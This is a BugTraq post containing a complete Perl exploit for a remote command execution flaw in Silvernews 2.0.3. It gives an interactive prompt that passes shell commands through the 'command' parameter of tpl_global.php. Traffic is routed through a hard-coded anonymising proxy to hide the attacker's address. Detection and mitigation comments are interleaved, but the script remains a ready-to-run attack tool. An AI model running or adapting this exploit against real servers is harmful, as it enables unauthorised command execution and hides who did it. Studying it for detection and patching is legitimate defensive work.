BugTraq
Silvernews 2.0.3 remote command execution exploit, proxy server support! Aug 05 2005 05:15PM
tsl securityfocus com, "[at]" securityfocus com,hackermail com securityfocus com
Exploit for the remote command execution vulnerability in Silvernews 2.0.3.
The vulnerability was originally reported in:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------

#!/usr/bin/perl

################TSL#####################################################
######
#
#
# SilverNews exploit, including proxy server function
# THROAT SECURITY LABS
#
# vuln: http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL#####################################################
######

# CR LF line terminator; appended to every line written to the socket and
# also interpolated into the header/body separator regex in sploit().
$l="\015\012";
# Output flag read by sploit(): response lines are echoed only while it is 1.
# It is set inside sploit() and never reset in the visible code.
$t=0;
# File-scoped state shared between the interactive loop and sploit().
my $sock;
my $target;
my $location;
my $command;
my $proxy;

# Proxy server that sploit() connects to on port 80.
# Defender note: the TCP connection is made to this proxy, not to the target,
# so the client address recorded by the web server is presumably the proxy's.
# Source-IP attribution from access logs alone should be treated as unreliable.
$proxy = "200.186.217.122"; # author's note: Brazil, high-anonymity proxy

use IO::Socket;

# sploit(): writes one HTTP GET for templates/tpl_global.php, with $command in
# the "command" query parameter, to the proxy in $proxy and prints the reply.
# Takes no arguments; reads the globals $proxy, $target, $location, $command,
# $l and $t. Dies if the proxy connection fails and exits with status 1 when
# a status line carries a code other than 200.
#
# Detection notes, derived from the request built below:
#   - access logs show a request path ending in /templates/tpl_global.php
#     with a "command=" query string;
#   - the User-Agent is the fixed string
#     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". It is a literal in
#     this script and easy to change, so match on path and parameter first.
# Mitigation note (general, not taken from this page): template include files
# such as this one normally need no direct HTTP access and can be denied at
# the web server; check the vendor for a fixed release.
sub sploit()
{

# Open a TCP connection to the proxy on port 80; abort with a message on failure.
$sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";

# Request line: target host, install path and the operator's input are
# interpolated directly, so the query string reaches the log largely verbatim.
print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";

# Fixed request headers sent with every request.
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
print $sock "Connection: close$l";

# Read the reply one line at a time into $_.
while (<$sock>) {

# A status line whose three-digit code is not 200 terminates the whole script.
if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
print "Error! Got HTTP return code $1. Exciting!\n";
exit 1;

}

# Echo the line only once the flag is set. The flag is set by the first line
# that consists solely of CR LF, i.e. the blank line ending the headers.
print if $t==1;
$t=1 if /^$l$/;

}

}

# Entry point: requires exactly two arguments (target host, install path).
# With any other argument count it prints the banner and usage text only.
if (@ARGV != 2)

{

print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
print "-------------------------------------------------------\n\n";
print "* usage:\t $0 [target] [path] \n";
print "* example:\t $0 www.target.com newssystem \n";
print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

# Both values are used unvalidated when sploit() builds the request line.
$target = $ARGV[0];
$location = $ARGV[1];

# Status message followed by a one-second pause; nothing is sent at this point.
print "sending exploit ... please wait\n";
sleep(1);

# Interactive loop: each non-empty line read from STDIN results in one HTTP
# request via sploit(). The loop has no exit condition of its own; the exit
# check below is commented out.
# Forensics note: a session therefore appears server-side as a series of
# separate GET requests to the same path, one per entered line.
while(1){

print "[sploit\@$target:/$location\] ";
$_=<STDIN>;
# Drop the last character of the input (the trailing newline).
chop;
# Ignore empty input.
next if /^$/;
# Replace a space with %20 before the line is placed in the URL.
s/ /%20/;
#if ($command=="exit") {exit} else {sploit()};
$command=$_;
sploit();

}

}

#EOF#
